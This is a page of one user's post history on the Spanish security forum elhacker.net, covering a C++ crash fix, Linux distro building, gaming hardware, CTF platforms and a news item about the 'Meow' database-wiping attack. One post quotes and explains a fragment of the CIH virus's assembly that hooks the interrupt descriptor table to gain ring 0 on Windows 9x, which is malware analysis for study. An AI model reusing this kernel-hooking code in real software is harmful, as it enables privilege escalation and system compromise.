elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 ... 92
321  Programación / Programación C/C++ / Re: Ayuda Dev c++ Error AppCrash al compilar y ejecutar en: 8 Agosto 2020, 05:43 am
Tengo un problema, estoy tratando de compilar con un constructor con varias variables, al codigo lo compila con exito pero al momento de darle click al exe tira un error AppCrash.
Porque me tira este error el IDE?

Porque estás retornando una dirección basura en la función ObtenerMensaje y el programa no puede leer direcciones inválidas, te dejo el código funcionando, le quité el string y reemplazé por void:

Código
  1. #include <iostream>
  2. #include <string>
  3. using std::cout;
  4. using std::cin;
  5. using std::endl;
  6. using std::string;
  7.  
  8. class Factura
  9. {
  10.    public:
  11.        Factura(string pieza,string descripcion,int cantidad, int precio )
  12.        {
  13.            CodigoPieza=pieza;
  14.            DescripcionPieza=descripcion;
  15.            CantidadPieza=cantidad;
  16.            PrecioPieza=precio;
  17.        }
  18.  
  19.        void ObtenerMensaje()
  20.        {
  21.            cout<<CodigoPieza<<endl<<
  22.            DescripcionPieza<<endl<<
  23.            CantidadPieza<<endl<<
  24.            PrecioPieza<<endl;
  25.        }
  26.    private:
  27.        string CodigoPieza;
  28.        string DescripcionPieza;
  29.        int CantidadPieza;
  30.        int PrecioPieza;    
  31. };
  32.  
  33. int main()
  34. {  
  35.    Factura Compra("1000","ESPEJO",23,4324);
  36.    cout<<"estos son los datos: ";
  37.    Compra.ObtenerMensaje();
  38.    cin.ignore();
  39.    return 0;
  40. }

Resultado:



B#
322  Sistemas Operativos / GNU/Linux / Re: Crear una distro hija!? en: 7 Agosto 2020, 20:37 pm
Alguien sabe alguna documentación acerca de la creación de una distros linux basándose en otra, ya sea en ubuntu o debian. Lo único que encuentro es From Scratch y eso es hacerla desde cero, lo que quiero es basarme en una y aumentarle y quitarle paquetes para ponerla en un USB pero no encuentro nd al respecto .

Lo que tendrías que buscar es información acerca de live-build, hay mucha info en internet y videos en inglés...



Algunos scripts automatizados:
https://github.com/elementary/os
https://github.com/UbuntuBudgie/iso-builder

Como crear PPAs:
https://askubuntu.com/questions/71510/how-do-i-create-a-ppa


B#
323  Seguridad Informática / Análisis y Diseño de Malware / Re: Obtencion de Ring 0 por parte del virus CIH en Windows 9x. en: 7 Agosto 2020, 18:46 pm
Hola,
Hace poco descargue el codigo fuente del virus CIH para entenderlo, pues me parece interesante. Sin embargo me encontre con una parte de el que no entiendo muy bien, como era de esperarse...

Código
  1. ; *************************************
  2. ; * Let's Modify *
  3. ; * IDT(Interrupt Descriptor Table) *
  4. ; * to Get Ring0 Privilege... *
  5. ; *************************************
  6.  
  7. push eax ;
  8. sidt [esp-02h] ; Get IDT Base Address
  9. pop ebx ;
  10.  
  11. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
  12.  
  13. cli
  14.  
  15. mov ebp, [ebx] ; Get Exception Base
  16. mov bp, [ebx-04h] ; Entry Point
  17.  
  18. lea esi, MyExceptionHook-@1[ecx]
  19.  
  20. push esi
  21.  
  22. mov [ebx-04h], si ;
  23. shr esi, 16 ; Modify Exception
  24. mov [ebx+02h], si ; Entry Point Address
  25.  
  26. pop esi

Nooooo que nostalgia, este código lo que hace es hookear el manejador de la interrupción en kernel mode de 32 bits...

Código
  1. push eax ;
  2. sidt [esp-02h] ; Get IDT Base Address
  3. pop ebx ;
  4.  
  5. add ebx, HookExceptionNumber*08h+04h ; ZF = 0

Lo que hace es obtener el puntero a la estructura de IDT y luego añadir el offset de la interrupción deseada (HookExceptionNumber) para llegar a la subestructura de la interrupción.

Código
  1. cli
Deshabilita las interrupciones si mal no recuerdo, eso es para poder escribir en sectores importantes como la IDT... En algun momento debe rehabilitar con la instrucción sti...

Código
  1. mov ebp, [ebx] ; Get Exception Base
  2. mov bp, [ebx-04h] ; Entry Point
  3.  
Ni idea porque hace eso exactamente...

Código
  1. lea esi, MyExceptionHook-@1[ecx]
  2.  
  3. push esi
  4.  
  5. mov [ebx-04h], si ;
  6. shr esi, 16 ; Modify Exception
  7. mov [ebx+02h], si ; Entry Point Address
  8.  
  9. pop esi

Obtiene la dirección del manejador MyExceptionHook y la inserta en la tabla Descriptor de la interrupción si mal no recuerdo, esa instrucción
Código
  1. shr
es un desplazamiento de bits para agregarla la mitad en una zona del descriptor, finalmente la otra mitad en iba en otra zona.

En castellano lo que hace esto es como un API Hooking de una interrupción, había un libro viejazo llamado Rootkits Subverting the Windows Kernel donde había un ejemplo completo hecho en C y assembler... Seguramente por internet debe haber un pdf o chm filtrado de ese libro. :silbar:


B#
324  Media / Juegos y Consolas / Re: dudas GTA 5 en: 2 Agosto 2020, 17:41 pm
una pregunta podria jugar gta 5 con un procesador i3 8 gb de ram y una grafica gigabyte nnvidia geforce gt 710 de 2 gb ddr5 uso windows 7

Tengo una configuración parecida, excepto que el procesador es AMD y funciona perfectamente con una gráfica de Nvidia GTX 750 TI con Windows 10...


B#
325  Seguridad Informática / Hacking / Re: Incinera tu sitio WEB! en: 29 Julio 2020, 03:32 am
Le añadí un easter egg por si no tiene vulnerabilidades reales.

Cita de: Banner
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 22:01:11 GMT
Server: Apache/2.4.38 (Debian)
h4x0r: what are you looking for?
Content-Length: 0
Content-Type: text/html; charset=UTF-8

 ;-) :laugh: :xD

Por otro lado el servidor donde está hosteado tiene 6 CVE potenciales del 2019...


B#
326  Programación / Programación General / Re: Which programming language should i lern en: 28 Julio 2020, 16:28 pm
In my opinion you should learn C/C++ with DirectX 12 or Vulkan... :silbar:


B#
327  Seguridad Informática / Hacking / Re: Se puede hackear una camara de seguridad? en: 27 Julio 2020, 03:14 am
Se puede hackear una camara de seguridad? Y si es así como se hace?

Firmware + Binwalk + IDA Pro / Ghidra + QEMU + Mucho Cerebro = https://www.youtube.com/watch?v=LaI0xjeefpg


B#
328  Foros Generales / Foro Libre / Re: Su opinion sobre tryhackme.com y hackthebox.eu en: 26 Julio 2020, 18:36 pm
Las han probado?
Si, ambas...
Que les parecen?
Son buenas aunque pueden ser un bastante complicados los retos si se tiene poca experiencia...
Cual creen que es mejor?
TryHackme tienen preguntas y respuestas que te van guíando por lo cuál parecer ser más sencillo para novatos, sin embargo me quedo con la interfaz de HTB que me gusta mucho más, además de tener múltiples servidores alrededor del mundo...
Son buenas herramientas para aprender?
Por supuesto.


B#
329  Foros Generales / Foro Libre / El ataque "Miau" que destruye datos de elasticsearch y mongodb no asegurados en: 24 Julio 2020, 05:52 am

El misterioso ataque "Miau" que destruye decenas de datos de elasticsearch y mongodb no asegurados.



Docenas de instancias no seguras de Elasticsearch y MongoDB expuestas en Internet han sido víctimas de una campaña rastreada como ataque Meow, en la que los actores maliciosos limpian las bases de datos sin ninguna explicación o una nota de ransomware.

Los ataques fueron vistos por primera vez por el investigador de seguridad Bob Diachenko. Se ha observado uno de los recientes ataques de Meow dirigidos a la base de datos Elasticsearch que pertenece al proveedor de VPN con sede en Hong Kong UFO VPN, que fue noticia recientemente cuando los investigadores de vpnMentor informaron que siete servicios de red privada virtual (UFO VPN, FAST VPN, FREE VPN, SUPER VPN, Flash VPN, Secure VPN y Rabbit VPN) filtraron 1,2 terabytes de datos privados del usuario.

Según Diachenko, UFO VPN aseguró su base de datos a principios de julio, pero el 20 de julio la base de datos volvió a aparecer en una dirección IP diferente y contenía registros tan recientes como el 19 de julio. El mismo día, la base de datos expuesta fue borrada en un ataque Meow , con solo registros recientes restantes.

Desde entonces, Meow y un ataque similar han destruido más de 1,000 otras bases de datos. Una búsqueda reciente de Shodan ha demostrado que 987 ElasticSearch y 70 instancias de MongoDB se han visto afectadas por el ataque Meow.

Diachenko dijo que no se sabe mucho sobre los atacantes o el razonamiento detrás de sus acciones. El investigador dijo que el ataque parece ser un script automatizado que "sobrescribe o destruye los datos por completo".

Ver artículo en: https://www.seguridadyfirewall.cl/2020/07/el-misterioso-ataque-miau-que-destruye.html





En mi opnión es increible que más de 6000 servidores estén afectados y no sean capaces de contratar a alguién que asegure los servidores:

https://pbs.twimg.com/media/EdnFqi6U4AYBRjJ?format=png


B#
330  Foros Generales / Foro Libre / Re: Hola. Soy nuevo me gustaria conocer a un mentor. Sobre hakeo de redes sociales en: 20 Julio 2020, 23:57 pm



B#
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 ... 92
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines